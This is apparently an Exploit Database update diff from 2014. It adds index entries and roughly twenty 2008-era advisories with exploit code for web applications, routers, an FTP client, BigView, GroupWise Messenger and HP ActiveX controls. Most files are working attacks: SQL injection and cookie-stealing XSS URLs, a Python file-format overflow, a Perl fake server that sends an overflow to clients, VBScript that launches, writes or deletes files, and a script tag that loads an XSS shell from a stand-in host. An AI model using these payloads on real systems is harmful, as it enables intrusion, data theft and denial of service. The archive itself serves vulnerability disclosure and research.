Updated 02_26_2014

files.csv

@@ -28661,3 +28661,23 @@ id,file,description,date,author,platform,type,port
 31869,platforms/asp/webapps/31869.txt,"i-pos Storefront 1.3 'index.asp' SQL Injection Vulnerability",2008-06-02,KnocKout,asp,webapps,0
 31870,platforms/php/webapps/31870.pl,"Joomla! and Mambo Joo!BB 0.5.9 Component 'forum' Parameter SQL Injection Vulnerability",2008-06-02,His0k4,php,webapps,0
 31871,platforms/asp/webapps/31871.txt,"Te Ecard 'id' Parameter Multiple SQL Injection Vulnerabilities",2008-06-02,"Ugurcan Engyn",asp,webapps,0
+31872,platforms/multiple/dos/31872.py,"NASA Ames Research Center BigView 1.8 PNM File Stack-Based Buffer Overflow Vulnerability",2008-06-04,"Alfredo Ortega",multiple,dos,0
+31873,platforms/windows/remote/31873.xml,"HP Instant Support 1.0.22 'HPISDataManager.dll' 'ExtractCab' ActiveX Control Buffer Overflow Vulnerability",2008-06-03,"Dennis Rand",windows,remote,0
+31876,platforms/windows/dos/31876.xml,"HP Instant Support 1.0.22 'HPISDataManager.dll' 'StartApp' ActiveX Control Insecure Method Vulnerability",2008-06-03,"Dennis Rand",windows,dos,0
+31877,platforms/windows/dos/31877.xml,"HP Instant Support 1.0.22 'HPISDataManager.dll' 'RegistryString' Buffer Overflow Vulnerability",2008-06-04,"Dennis Rand",windows,dos,0
+31878,platforms/windows/dos/31878.xml,"HP Instant Support 1.0.22 'HPISDataManager.dll' ActiveX Control Arbitrary File Creation Vulnerability",2008-06-03,"Dennis Rand",windows,dos,0
+31879,platforms/windows/dos/31879.xml,"HP Instant Support 1.0.22 'HPISDataManager.dll' ActiveX Control Arbitrary File Delete Vulnerability",2008-06-03,"Dennis Rand",windows,dos,0
+31880,platforms/php/webapps/31880.txt,"WyMIEN PHP 1.0 'index.php' Cross Site Scripting Vulnerability",2008-06-04,ZoRLu,php,webapps,0
+31881,platforms/php/webapps/31881.txt,"PHP Address Book 3.1.5 Multiple SQL Injection and Cross-Site Scripting Vulnerabilities",2008-06-04,"CWH Underground",php,webapps,0
+31882,platforms/php/webapps/31882.txt,"SamTodo 1.1 'tid' Parameter Cross Site Scripting Vulnerability",2008-06-05,"David Sopas Ferreira",php,webapps,0
+31883,platforms/php/webapps/31883.txt,"SamTodo 1.1 'completed' Parameter Cross Site Scripting Vulnerability",2008-06-05,"David Sopas Ferreira",php,webapps,0
+31884,platforms/hardware/dos/31884.txt,"Linksys WRH54G 1.1.3 Wireless-G Router Malformed HTTP Request Denial of Service Vulnerability",2008-06-05,dubingyao,hardware,dos,0
+31885,platforms/hardware/remote/31885.txt,"F5 FirePass 6.0.2.3 /vdesk/admincon/webyfiers.php css_exceptions Parameter XSS",2008-06-05,nnposter,hardware,remote,0
+31886,platforms/hardware/remote/31886.txt,"F5 FirePass 6.0.2.3 /vdesk/admincon/index.php sql_matchscope Parameter XSS",2008-06-05,nnposter,hardware,remote,0
+31887,platforms/linux/remote/31887.txt,"ALFTP FTP Client  4.1/5.0 'LIST' Command Directory Traversal Vulnerability",2008-06-06,"Tan Chew Keong",linux,remote,0
+31888,platforms/php/webapps/31888.txt,"SchoolCenter 7.5 Multiple Cross Site Scripting Vulnerabilities",2008-06-06,Doz,php,webapps,0
+31889,platforms/novell/dos/31889.pl,"Novell GroupWise Messenger 2.0 Client Buffer Overflow Vulnerabilities",2008-07-02,"Francisco Amato",novell,dos,0
+31890,platforms/multiple/remote/31890.txt,"Diigo Toolbar and Diigolet Comment Feature HTML Injection and Information Disclosure Vulnerabilities",2008-06-20,"Ferruh Mavituna",multiple,remote,0
+31891,platforms/asp/webapps/31891.txt,"Real Estate Website 1.0 'location.asp' Multiple Input Validation Vulnerabilities",2008-06-09,JosS,asp,webapps,0
+31892,platforms/cgi/webapps/31892.txt,"Tornado Knowledge Retrieval System 4.2 'p' Parameter Cross Site Scripting Vulnerability",2008-06-10,Unohope,cgi,webapps,0
+31893,platforms/php/webapps/31893.txt,"Hot Links SQL-PHP Multiple Cross Site Scripting Vulnerabilities",2008-06-10,sl4xUz,php,webapps,0

platforms/asp/webapps/31891.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/29612/info
+
+Real Estate Website is prone to multiple input-validation vulnerabilities, including an SQL-injection issue and a cross-site scripting issue, because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Real Estate Website 1.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/PATH/location.asp?name="><script>alert('JosS')</script> http://www.example.com/PATH/location.asp?name=JosS&location=IIF((select%20mid(last(Name),1,1)%20from%20(select%20top%2010%20Namee%20from%20MSysObjects))='a',0,'done')%00 

platforms/cgi/webapps/31892.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/29626/info
+
+Tornado Knowledge Retrieval System is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Tornado Knowledge Retrieval System 4.2 is vulnerable; prior versions may also be affected.
+
+http://www.example.com/tornado/searcher.exe?v=root&p=<script>alert(/xss/)</script>

platforms/hardware/dos/31884.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/29570/info
+
+Linksys WRH54G Wireless-G Router is prone to a denial-of-service vulnerability because it fails to adequately handle malformed HTTP requests. As a result, memory becomes corrupted and the device's HTTP service will crash.
+
+Successful exploits will deny service to legitimate users. Given the nature of this issue, remote code execution may be possible, but this has not been confirmed.
+
+WRH54G firmware version 1.01.03 is vulnerable; other versions may also be affected.
+
+http://192.168.1.106/./front_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_page.asp 

platforms/hardware/remote/31885.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/29574/info
+
+F5 FirePass SSL VPN is prone to multiple cross-site request-forgery vulnerabilities because it fails to adequately sanitize user-supplied input.
+
+Exploiting these issues may allow a remote attacker to execute arbitrary actions in the context of the affected application.
+
+FirePass 6.0.2 hotfix 3 is vulnerable; other versions may also be affected.
+
+https://www.example.com/vdesk/admincon/webyfiers.php?a=css&click=1&css_exceptions=%22+onfocus%3Dalert%28%26quot%3BXSS1%26quot%3B%29+foo%3D%22&save_css_exceptions=Update

platforms/hardware/remote/31886.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/29574/info
+ 
+F5 FirePass SSL VPN is prone to multiple cross-site request-forgery vulnerabilities because it fails to adequately sanitize user-supplied input.
+ 
+Exploiting these issues may allow a remote attacker to execute arbitrary actions in the context of the affected application.
+ 
+FirePass 6.0.2 hotfix 3 is vulnerable; other versions may also be affected.
+
+https://www.example.com/vdesk/admincon/index.php?a=css&sub=sql&sql_matchscope=%22+onfocus%3Dalert%28%26quot%3BXSS2%26quot%3B%29+foo%3D%22&save_sql_matchscope=Update

platforms/linux/remote/31887.txt

@@ -0,0 +1,14 @@
+source: http://www.securityfocus.com/bid/29585/info
+
+ALFTP is prone to a directory-traversal vulnerability because the application fails to sufficiently sanitize user-supplied input. This issue occurs in the FTP client.
+
+Exploiting this issue will allow an attacker to write arbitrary files to locations outside of the application's current directory. This could help the attacker launch further attacks.
+
+ALFTP 4.1 beta 2 (English) and 5.0 (Korean) are vulnerable; other versions may also be affected.
+
+Response to LIST (backslash):
+
+\..\..\..\..\..\..\..\..\..\testfile.txt\r\n
+
+Response to LIST (forward-slash):
+/../../../../../../../../../testfile.txt\r\n 

platforms/multiple/dos/31872.py

@@ -0,0 +1,50 @@
+source: http://www.securityfocus.com/bid/29517/info
+
+NASA Ames Research Center BigView is prone to a remote stack-based buffer-overflow vulnerability because it fails to properly bounds-check user-supplied data before copying it to an insufficiently sized memory buffer.
+
+An attacker can exploit this issue to execute arbitrary code in the context of the application. Successful attacks will compromise the application and underlying computer. Failed exploit attempts will result in a denial of service.
+
+BigView 1.8 is vulnerable; other versions may also be affected. 
+
+/-----------
+
+## BigView exploit
+## Alfredo Ortega - Core Security Exploit Writers Team (EWT)
+## Works against BigView "browse" revision 1.8 compiled on ubuntu 6.06
+Desktop i386
+
+import struct
+w = open("crash.ppm","wb")
+w.write("""P3
+#CREATOR: The GIMP's PNM Filter Version
+1.0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA""")
+# This exploit is not trivial, because the function PPM::ppmHeader()
+doesn't return inmmediately, and we must modify internal variables to
+cause an overwrite of a C++ string destructor executed at the end of the
+function to gain control of EIP
+# PS.: Congrats for the Phoenix mars Lander!
+for i in range(7):
+                w.write(chr(i)*4)
+w.write("AA")
+w.write(struct.pack("<L",0xaaaaaaaa))
+w.write(struct.pack("<L",0xbbbbbbbb))
+w.write(struct.pack("<L",0xcccccccc))
+w.write(struct.pack("<L",0x08080000))
+w.write(struct.pack("<L",0x08080000)*48)
+
+#The address of the destructor is hard-coded. Sorry but this is only a 
+PoC!
+destination = 0x0805b294 # destructor
+value = 0x41414141 #address to jump to
+w.write(struct.pack("<L",destination)) # destination
+
+w.write("""
+%d 300
+255
+255
+255
+255
+""" % value)
+w.close()
+
+- -----------/ 

platforms/multiple/remote/31890.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/29611/info
+
+Diigo Toolbar and Diigolet are prone to an HTML-injection vulnerability and an information-disclosure vulnerability when handling data via the 'comment' feature.
+
+An attacker can exploit the HTML-injection issue to run arbitrary HTML and script code in the plugin of an unsuspecting user in the context of the domain on which a shared comment was made. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+The attacker can exploit the information-disclosure issue via successful man-in-the-middle attacks. Information harvested may aid in further attacks.
+
+<script src="http://example.com/xssshell/"></script> 

platforms/novell/dos/31889.pl

@@ -0,0 +1,142 @@
+source: http://www.securityfocus.com/bid/29602/info
+
+Novell GroupWise Messenger is prone to two buffer-overflow vulnerabilities because it fails to adequately bounds-check user-supplied data before copying it to an insufficiently sized buffer.
+
+Attackers can exploit these issues to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
+
+Versions prior to Novell GroupWise Messenger 2.0.3 HP1 are vulnerable.
+
+#!/usr/bin/perl -w
+
+##
+#Simple fake groupwise msn server.
+#Date: 07/02/2008
+#[ISR] - www.infobyte.com.ar
+#Author: Francisco Amato
+##
+
+use strict;
+use IO::Socket;
+use Data::Dump qw(dump);
+
+my $port=8300;
+my $conn="HTTP/1.0 200 \r\nDate: Sat, 12 Jan 2008 01:28:59 GMT\r\nPragma: no-cache\r\nCache-Control: no-cache\r\n\r\n\n\0\20\0\0\0nnmFileTransfer\0\2\0\0\x000\0\n\0\t\0\0\0nnmQuery\0\2\0\0\x001\0\n\0\13\0\0\0nnmArchive\0\2\0\0\x001\0\n\0\24\0\0\0nnmPasswordRemember\0\2\0\0\x001\0\n\0\17\0\0\0nnmMaxContacts\0\4\0\0\x00150\0\n\0\16\0\0\0nnmMaxFolders\0\3\0\0\x0050\0\n\0\r\0\0\0nnmBroadcast\0\2\0\0\x001\0\n\0\23\0\0\0nnmPersonalHistory\0\2\0\0\x001\0\n\0\r\0\0\0nnmPrintSave\0\2\0\0\x001\0\n\0\17\0\0\0nnmChatService\0\2\0\0\x001\0\n\0\3\0\0\0CN\0\a\0\0\0ISR000\0\n\0\b\0\0\0Surname\0\6\0\0\0Amato\0\n\0\n\0\0\0Full Name\0\20\0\0\0Client Name    \0\n\0\13\0\0\0Given Name\0\n\0\0\0Client   \0\n\0\r\0\0\0nnmLastLogin\0\13\0\0\x001200112090\0\t\0\30\0\0\0NM_A_FA_CLIENT_SETTINGS\0\1\0\0\0\n\0\21\0\0\0Novell.AskToSave\0\2\0\0\x001\0\t\0\e\0\0\0NM_A_FA_INFO_DISPLAY_ARRAY\0\1\0\0\0\n\0\27\0\0\0Internet EMail Address\0\26\0\0\0xxxxx\@xxxxxxxx.com.xx\0\b\0\16\0\0\0NM_A_UD_BUILD\0\a\0\0\0\n\0\13\0\0\0NM_A_SZ_DN\x001\0\0\0CN=ISR000,OU=IT,OU=ISR_,OU=BA,OU=AR,O=INFOBYTEXX\0\t\0\24\0\0\0NM_A_FA_AU_SETTINGS\0\1\0\0\0\n\0\22\0\0\0nnmClientDownload\0\2\0\0\x000\0\b\0\22\0\0\0NM_A_UD_KEEPALIVE\0\n\0\0\0\n\0\24\0\0\0NM_A_SZ_RESULT_CODE\0\2\0\0\x000\0\n\0\27\0\0\0NM_A_SZ_TRANSACTION_ID\0\2\0\0\x001\0\0";
+my $resp="HTTP/1.0 200 \r\nDate: Fri, 04 Jan 2008 09:55:40 GMT\r\nPragma: no-cache\r\nCache-Control: no-cache\r\n\r\n\n\0\24\0\0\0NM_A_SZ_RESULT_CODE\0\2\0\0\x000\0\n\0\27\0\0\0NM_A_SZ_TRANSACTION_ID\0\2\0\0\x00c0d3\0\0";
+my $crash="A"x5000;
+#initial
+&main;
+
+##########################################################################
+# FUNCTION	main
+# RECEIVES
+# RETURNS
+# EXPECTS
+# DOES		application's startup
+sub main {
+
+    #ignore child's process
+    $SIG{CHLD} = 'IGNORE';
+
+    my $listen_socket = IO::Socket::INET->new(LocalPort => $port,
+					      Listen => 10,
+					      Proto => 'tcp',
+					      Reuse => 1);
+
+    die "Cant't create a listening socket: $@" unless $listen_socket;
+
+    print "[ISR] www.infobyte.com.ar - Francisco Amato\n";
+    print "[Groupwise Messager] Fake Server ready. Waiting for connections ... \n";
+
+    #esperar conexiones
+    while (my $connection = $listen_socket->accept){
+
+	my $child;
+	# crear el fork para salir
+	die "Can't fork: $!" unless defined ($child = fork());
+
+	#child
+	if ($child == 0){
+
+	    #close socket
+	    $listen_socket->close;
+
+	    #process request
+	    &client($connection);
+
+	    exit 0;
+	}
+	#father
+	else{
+
+	    warn "Connecton recieved ... ",$connection->peerhost,"\n";
+
+	    #close connection
+	    $connection->close();
+
+	}
+    }
+}
+##########################################################################
+# FUNCTION	client
+# RECEIVES
+# RETURNS
+# EXPECTS
+# DOES		process client request
+sub client{
+
+    my ($socket) = @_;
+    my $st=2; #initial code
+
+    $|=1;
+
+    my $rp;
+    my $data = <$socket>;
+    pdata($data);
+    if ($data =~ /POST \/login/){
+	$data = <$socket>;
+	pdata($data);
+	$data = <$socket>;
+	pdata($data);
+	$data = <$socket>;
+	pdata($data);
+	printf $socket $conn;
+	pdata($conn,1);
+	while ($data = <$socket>){ #commands
+	    if ($data =~ /POST \/setstatus/){
+
+		pdata($data);
+		$data = <$socket>;
+		pdata($data);
+		$data = <$socket>;
+		pdata($data);
+
+		$rp=$resp;
+		$rp =~ s/c0d3/$st/g;
+		$rp .=$crash;
+		printf $socket $rp;
+		pdata($rp,1);
+		$st++;
+
+	    }else{
+		pdata("ELSE -". $data);
+	    }
+	}
+    }
+    close($socket);
+
+}
+##########################################################################
+# FUNCTION	pdata
+# RECEIVES
+# RETURNS
+# EXPECTS
+# DOES		debug information
+sub pdata {
+    my ($data,$orden) =@_;
+    if ($orden){
+	print "[SERVER] - ";
+    }else{
+	print "[CLIENT] - ";
+    }
+    print dump($data) . "\n";
+}

platforms/php/webapps/31880.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/29551/info
+
+WyMIEN PHP is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+WyMIEN PHP 1.0RC2 is vulnerable; other versions may also be affected.
+
+http://www.example.com/WyMienphp1.0-RC2/WyMienphp/index.php?f=[XSS] 

platforms/php/webapps/31881.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/29560/info
+
+PHP Address Book is prone to multiple cross-site scripting and SQL-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
+
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+PHP-Address Book 3.1.5 is vulnerable; other versions may also be affected.
+
+http://www.example.com/view.php?id=-1 union select 1,2,3,id,firstname,lastname,7,address,mobile,10,11,12,email,14 from addressbook/* http://www.example.com/edit.php?id=-1 union select 1,2,3,id,firstname,lastname,7,address,mobile,10,11,12,email,14 from addressbook/* http://www.example.com/?group=<XSS> http://www.example.com/index.php?group=<XSS>

platforms/php/webapps/31882.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/29568/info
+
+SamTodo is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+SamTodo 1.1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/index.php?go=main.taskeditor&tid=f29de7fa-6625-4e20-8a19-11c0f4d799f6[XSS]&mode=edit 

platforms/php/webapps/31883.txt

@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/29569/info
+
+SamTodo is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+SamTodo 1.1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/index.php?go=main.default&completed=1%22%3E%3Ch1%3Ef00bar%3C/h1%3E
+
+http://www.example.com/index.php?go=main.default&orderBy=taskComplete&ascDesc=DESC&completed=1%22%3E%3Ch1%3Ef00bar%3C/h1%3E
+

platforms/php/webapps/31888.txt

@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/29591/info
+
+SchoolCenter is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+http://www.example.com/education/components/docmgr/default.php?sectiondetailid=2179&fileitem=477&catfilter=XSS
+http://www.example.com/education/components/docmgr/default.php?sectiondetailid=#XSS
+http://www.example.com/education/components/scrapbook/default.php?sectiondetailid=#XSS
+http://www.example.com/education/district/district.php?sectiondetailid=#XSS
+http://www.example.com/education/admin/XSS
+http://www.example.com/education/components/XSS
+http://www.example.com/education/components/whatsnew/default.php?sectiondetailid=#XSS 

platforms/php/webapps/31893.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/29632/info
+
+Hot Links SQL-PHP is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. 
+
+http://www.example.com/path/search.php?search=[XSS] http://www.example.com/path/search.php?search='><script>alert(document.cookie);</script> http://www.example.com/path/report.php?id=[XSS] http://www.example.com/path/report.php?id='><script>alert(document.cookie);</script> http://www.example.com/path/reviews.php?action=review&id==[XSS] http://www.example.com/path/reviews.php?action=review&id='><script>alert(document.cookie);</script> http://www.example.com/path/reviews.php?action=rate&id=[XSS] http://www.example.com/path/reviews.php?action=rate&id='><script>alert(document.cookie);</script>

platforms/windows/dos/31876.xml

@@ -0,0 +1,14 @@
+source: http://www.securityfocus.com/bid/29533/info
+
+
+HP Instant Support 'HPISDataManager.dll' ActiveX control is prone to an insecure-method vulnerability.
+
+Successfully exploiting this issue allows remote attackers to launch arbitrary applications with the privileges of the application running the ActiveX control (typically Internet Explorer).
+
+Note that if the attacker could place a malicious executable on the system, they would be able to launch it using this vulnerability.
+
+HP Instant Support 1.0.0.22 and earlier versions are affected.
+
+NOTE: This issue was previously covered in BID 29526 (HP Instant Support 'HPISDataManager.dll' ActiveX Control Unspecified Code Execution Vulnerabilities), but has been given its own record because of new information. 
+
+<?XML version='1.0' standalone='yes' ?> <package><job id='DoneInVBS' debug='false' error='true'> <object classid='clsid:14C1B87C-3342-445F-9B5E-365FF330A3AC' id='target' /> <script language='vbscript'> 'for debugging/custom prolog targetFile = "C:\WINDOWS\Downloaded Program Files\HPISDataManager.dll" prototype = "Function StartApp ( ByVal appName As String ) As String" memberName = "StartApp" progid = "HPISDataManagerLib.Datamgr" argCount = 1 arg1="c:\evilfile.exe" target.StartApp arg1 </script></job></package>

platforms/windows/dos/31877.xml

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/29534/info
+
+HP Instant Support 'HPISDataManager.dll' ActiveX control is prone to a remote buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input.
+
+An attacker can exploit this issue to execute arbitrary code in the context of an application using the ActiveX control (typically Internet Explorer). Failed attacks will likely cause denial-of-service conditions.
+
+HP Instant Support 1.0.0.22 and earlier versions are affected.
+
+NOTE: This issue was previously covered in BID 29526 (HP Instant Support 'HPISDataManager.dll' ActiveX Control Unspecified Code Execution Vulnerabilities), but has been given its own record because of new information.
+
+<?XML version='1.0' standalone='yes' ?> <package><job id='DoneInVBS' debug='false' error='true'> <object classid='clsid:14C1B87C-3342-445F-9B5E-365FF330A3AC' id='target' /> <script language='vbscript'> 'for debugging/custom prolog targetFile = "C:\WINDOWS\Downloaded Program Files\HPISDataManager.dll" prototype = "Property Let RegistryString ( ByVal bstrRegistryKey As String , ByVal bUserKey As Long ) As String" memberName = "RegistryString" progid = "HPISDataManagerLib.Datamgr" argCount = 3 arg1=String(2068, "B") arg2=1 arg3="defaultV" target.RegistryString(arg1 ,arg2 ) = arg3 </script></job></package> 

platforms/windows/dos/31878.xml

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/29535/info
+
+HP Instant Support 'HPISDataManager.dll' ActiveX control is prone to a vulnerability that lets attackers create and overwrite files with arbitrary, attacker-controlled content.
+
+Successful exploits may compromise affected computers and aid in further attacks.
+
+HP Instant Support 1.0.0.22 and earlier versions are affected.
+
+NOTE: This issue was previously covered in BID 29526 (HP Instant Support 'HPISDataManager.dll' ActiveX Control Unspecified Code Execution Vulnerabilities), but has been given its own record because of new information.
+
+<?XML version='1.0' standalone='yes' ?> <package><job id='DoneInVBS' debug='false' error='true'> <object classid='clsid:14C1B87C-3342-445F-9B5E-365FF330A3AC' id='target' /> <script language='vbscript'> targetFile = "C:\WINDOWS\Downloaded Program Files\HPISDataManager.dll" prototype = "Sub AppendStringToFile ( ByVal bstrInputFileName As String , ByVal bstrInputString As String )" memberName = "AppendStringToFile" progid = "HPISDataManagerLib.Datamgr" argCount = 2 arg1="c:\evil.exe" arg2=String("CSIS entered this") target.AppendStringToFile arg1 ,arg2 </script></job></package> 

platforms/windows/dos/31879.xml

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/29536/info
+
+HP Instant Support 'HPISDataManager.dll' ActiveX control is prone to a vulnerability that lets attackers delete arbitrary files on the affected computer in the context of the application using the ActiveX control. Successful attacks can result in denial-of-service conditions.
+
+HP Instant Support 1.0.0.22 and earlier versions are affected.
+
+NOTE: This issue was previously covered in BID 29526 (HP Instant Support 'HPISDataManager.dll' ActiveX Control Unspecified Code Execution Vulnerabilities), but has been given its own record because of new information.
+
+<?XML version='1.0' standalone='yes' ?> <package><job id='DoneInVBS' debug='false' error='true'> <object classid='clsid:14C1B87C-3342-445F-9B5E-365FF330A3AC' id='target' /> <script language='vbscript'> 'for debugging/custom prolog targetFile = "C:\WINDOWS\Downloaded Program Files\HPISDataManager.dll" prototype = "Sub DeleteSingleFile ( ByVal pszFileName As String )" memberName = "DeleteSingleFile" progid = "HPISDataManagerLib.Datamgr" argCount = 1 arg1="c:\evil.exe" target.DeleteSingleFile arg1 </script></job></package>

platforms/windows/remote/31873.xml

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/29529/info
+
+HP Instant Support 'HPISDataManager.dll' ActiveX control is prone to a remote buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input.
+
+An attacker can exploit this issue to execute arbitrary code in the context of an application using the ActiveX control (typically Internet Explorer). Failed attacks will likely cause denial-of-service conditions.
+
+HP Instant Support 1.0.0.22 and earlier versions are affected.
+
+NOTE: This issue was previously covered in BID 29526 (HP Instant Support 'HPISDataManager.dll' ActiveX Control Unspecified Code Execution Vulnerabilities), but has been given its own record because of new information. 
+
+<?XML version='1.0' standalone='yes' ?> <package><job id='DoneInVBS' debug='false' error='true'> <object classid='clsid:14C1B87C-3342-445F-9B5E-365FF330A3AC' id='target' /> <script language='vbscript'> 'for debugging/custom prolog targetFile = "C:\WINDOWS\Downloaded Program Files\HPISDataManager.dll" prototype = "Function ExtractCab ( ByVal filepath As String , ByVal destpath As String ) As String" memberName = "ExtractCab" progid = "HPISDataManagerLib.Datamgr" argCount = 2 arg1=String(277, "B") arg2="defaultV" target.ExtractCab arg1 ,arg2 </script></job></package>